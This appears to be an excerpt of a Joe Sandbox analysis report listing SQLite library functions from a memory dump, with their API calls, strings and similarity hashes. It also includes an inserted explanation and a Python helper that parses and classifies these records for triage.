                                                                          • Instruction ID: 9ac78cbffd0e0cf27e5d0fdbf17c3a3d034f00011a14f89e76d08e502163788c
                                                                          • Opcode Fuzzy Hash: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                          • Instruction Fuzzy Hash: 8751F1B49467099FDB01DF69D59178EBBF6FF68318F104429E884AB300D379D894CB91
                                                                          APIs
                                                                          • sqlite3_finalize.SQLITE3 ref: 609407B4
                                                                            • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                                            • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                                          • sqlite3_finalize.SQLITE3 ref: 609407C2
                                                                            • Part of subcall function 6094064B: sqlite3_mutex_enter.SQLITE3 ref: 609406A7
                                                                          • sqlite3_finalize.SQLITE3 ref: 609407D0
                                                                          • sqlite3_finalize.SQLITE3 ref: 609407DE
                                                                          • sqlite3_finalize.SQLITE3 ref: 609407EC
                                                                          • sqlite3_finalize.SQLITE3 ref: 609407FA
                                                                          • sqlite3_finalize.SQLITE3 ref: 60940808
                                                                          • sqlite3_finalize.SQLITE3 ref: 60940816
                                                                          • sqlite3_finalize.SQLITE3 ref: 60940824
                                                                          • sqlite3_free.SQLITE3 ref: 6094082C
                                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                           • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_finalize$sqlite3_logsqlite3_mutex_enter$sqlite3_free
                                                                          • String ID:
                                                                          • API String ID: 14011187-0
                                                                          • Opcode ID: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                                          • Instruction ID: 14c977e837db455c9c1ce3b69ce7d4e0fb0da6313972e550a4586d0eb1b189ee
                                                                          • Opcode Fuzzy Hash: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                                          • Instruction Fuzzy Hash: F7116774504B008BCB50BF78C9C965877E9AFB5308F061978EC8A8F306EB34D4918B15
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                           • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                          • API String ID: 0-780898
                                                                          • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                          • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                          • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                          • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                           • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                          • API String ID: 0-2604012851
                                                                          • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                          • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                          • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                          • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                           • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: memcmp$sqlite3_logsqlite3_mutex_try
                                                                          • String ID: 0$SQLite format 3
                                                                          • API String ID: 3174206576-3388949527
                                                                          • Opcode ID: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                          • Instruction ID: d3cc03899c2fb96d27ccc41cf7ad58ff30b38a29db2c3208110d6cb2c70dce50
                                                                          • Opcode Fuzzy Hash: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                          • Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
                                                                          APIs
                                                                          • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                          • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                          • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                          • sqlite3_free.SQLITE3 ref: 6095F180
                                                                            • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                            • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                          • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                          • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                           • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                          • String ID: |
                                                                          • API String ID: 1576672187-2343686810
                                                                          • Opcode ID: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                                          • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                          • Opcode Fuzzy Hash: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                                          • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
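The records above all follow one layout (an optional APIs list, the memory-dump source, the IDA plugin snapshot and a Similarity block ending in the Instruction Fuzzy Hash), and nearly every call they list is a sqlite3_* export; the record with the memcmp against "SQLite format 3" is checking the SQLite database file header magic. A triage step that helps here is to parse the records, separate functions whose calls are entirely sqlite3_* library calls from those that reach other modules (strcmp.MSVCRT, for instance), and keep the API String ID / Instruction Fuzzy Hash pair for matching against other analyses. The helper below is an added example, not code from the Joe Sandbox report or from the getlab.exe sample; it assumes only the text layout visible in this listing, and its SAMPLE input is three records copied from this page with the table indentation removed and the fields it does not read trimmed away.

```python
"""Parse the per-function records of a Joe Sandbox 'Similarity' listing.

Added example; not code from the Joe Sandbox report or from the sample it analyses.
Assumes the layout seen in the listing: an optional 'APIs' list, optional
'Memory Dump Source' / 'Joe Sandbox IDA Plugin' blocks, and a 'Similarity' block
whose last line is 'Instruction Fuzzy Hash'.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: three records copied from the listing, indentation removed and
# unused fields dropped. The second record has no APIs list in the extracted text.
SAMPLE = """\
APIs
• sqlite3_finalize.SQLITE3 ref: 609407B4
  • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
• sqlite3_free.SQLITE3 ref: 6094082C
Memory Dump Source
• Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
Similarity
• API ID: sqlite3_finalize$sqlite3_logsqlite3_mutex_enter$sqlite3_free
• String ID:
• API String ID: 14011187-0
• Instruction Fuzzy Hash: F7116774504B008BCB50BF78C9C965877E9AFB5308F061978EC8A8F306EB34D4918B15
APIs
Strings
Similarity
• API ID: memcmp$sqlite3_logsqlite3_mutex_try
• String ID: 0$SQLite format 3
• API String ID: 3174206576-3388949527
• Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
APIs
• sqlite3_value_text.SQLITE3 ref: 6095F030
• sqlite3_stricmp.SQLITE3 ref: 6095F0B3
  • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
• sqlite3_result_error_code.SQLITE3 ref: 6095F34E
Strings
Similarity
• API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
• String ID: |
• API String ID: 1576672187-2343686810
• Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
"""

# "name.MODULE ref: ADDR", optionally prefixed with the "Part of subcall function"
# marker the report uses for calls made by a callee rather than the function itself.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+) ref: (?P<addr>[0-9A-F]+)$"
)
# "Key: value" lines; the value may be empty ("String ID:").
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?):\s?(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    addr: int
    via_subcall: Optional[str]  # callee address when the call is indirect, else None


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def strings(self):
        # The String ID field joins the function's string references with '$'.
        return [s for s in self.fields.get("String ID", "").split("$") if s]


def parse_records(text):
    """Split the listing into records; a record closes at its Instruction Fuzzy Hash."""
    records, current = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if not line:
            continue
        m = API_RE.match(line)
        if m:
            current.calls.append(ApiCall(m["name"], m["module"], int(m["addr"], 16), m["caller"]))
            continue
        m = KV_RE.match(line)
        if m:
            current.fields[m["key"]] = m["value"].strip()
            if m["key"] == "Instruction Fuzzy Hash":
                records.append(current)
                current = FunctionRecord()
    return records


def classify(rec):
    """'library-only' if every listed call is a sqlite3_* export, 'mixed' if any call
    goes elsewhere, 'no-api-list' if the extracted record carries no call list
    (the concatenated API ID summary is ambiguous, so it is not used for this)."""
    names = {c.name for c in rec.calls}
    if not names:
        return "no-api-list"
    return "library-only" if all(n.startswith("sqlite3_") for n in names) else "mixed"


def non_library_calls(rec):
    return sorted({c.name for c in rec.calls if not c.name.startswith("sqlite3_")})


def pivot_table(records):
    """API String ID -> Instruction Fuzzy Hash, the keys the Similarity block exposes."""
    return {r.fields["API String ID"]: r.fields["Instruction Fuzzy Hash"] for r in records}


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(classify(rec), rec.fields["API String ID"], rec.strings, non_library_calls(rec))
```

The classification deliberately ignores the API ID summary line: the report concatenates the names of equally frequent calls without a separator (sqlite3_stricmpstrcmp), so only the explicit APIs list can tell a library call from a runtime call reliably.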
                                                                          APIs
                                                                          • sqlite3_file_control.SQLITE3 ref: 609537BD
                                                                          • sqlite3_free.SQLITE3 ref: 60953842
                                                                          • sqlite3_free.SQLITE3 ref: 6095387C
                                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                          • sqlite3_stricmp.SQLITE3 ref: 609538D4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                           • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_file_controlsqlite3_mutex_entersqlite3_stricmp
                                                                          • String ID: 6$timeout
                                                                          • API String ID: 2671017102-3660802998
                                                                          • Opcode ID: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
                                                                          • Instruction ID: da3e9078838fdf1f068eeacc94130b5fe058058c2a53432068b0843c8cdd1fdd
                                                                          • Opcode Fuzzy Hash: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
                                                                          • Instruction Fuzzy Hash: 6CA11270A083198BDB15CF6AC88079EBBF6BFA9304F10846DE8589B354D774D885CF41
                                                                          APIs
                                                                          • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                            • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                          • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                          • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                           • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                          • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                          • API String ID: 652164897-1572359634
                                                                          • Opcode ID: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                                          • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                          • Opcode Fuzzy Hash: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                                          • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                          APIs
                                                                          • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                          • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                          • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                          • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                           • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                          • String ID:
                                                                          • API String ID: 2352520524-0
                                                                          • Opcode ID: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                                          • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                          • Opcode Fuzzy Hash: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                                          • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                          APIs
                                                                            • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                            • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                            • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                          • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                            • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                          • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                            • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                            • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                            • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                          • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                          • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                          • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                          • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                           • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                           • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                          • String ID: optimize
                                                                          • API String ID: 3659050757-3797040228
                                                                          • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                          • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                          • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                          • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                          APIs
                                                                          • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                          • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                          • sqlite3_reset.SQLITE3 ref: 60965556
                                                                          • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                            • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                            • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                          • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                          • sqlite3_free.SQLITE3 ref: 60965714
                                                                          • sqlite3_free.SQLITE3 ref: 6096574B
                                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                          • sqlite3_free.SQLITE3 ref: 609657AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 2722129401-0
                                                                          • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                          • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                                          • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                          • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                          APIs
                                                                          • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                            • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                          • sqlite3_free.SQLITE3 ref: 609647C5
                                                                            • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                          • sqlite3_free.SQLITE3 ref: 6096476B
                                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                          • sqlite3_free.SQLITE3 ref: 6096477B
                                                                          • sqlite3_free.SQLITE3 ref: 60964783
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                                          • String ID:
                                                                          • API String ID: 571598680-0
                                                                          • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                          • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                                          • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                                          • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                                          APIs
                                                                          • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                            • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                          • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                          • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                          • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                          • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                          • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                          • sqlite3_free.SQLITE3 ref: 60963621
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                          • String ID:
                                                                          • API String ID: 4276469440-0
                                                                          • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                          • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
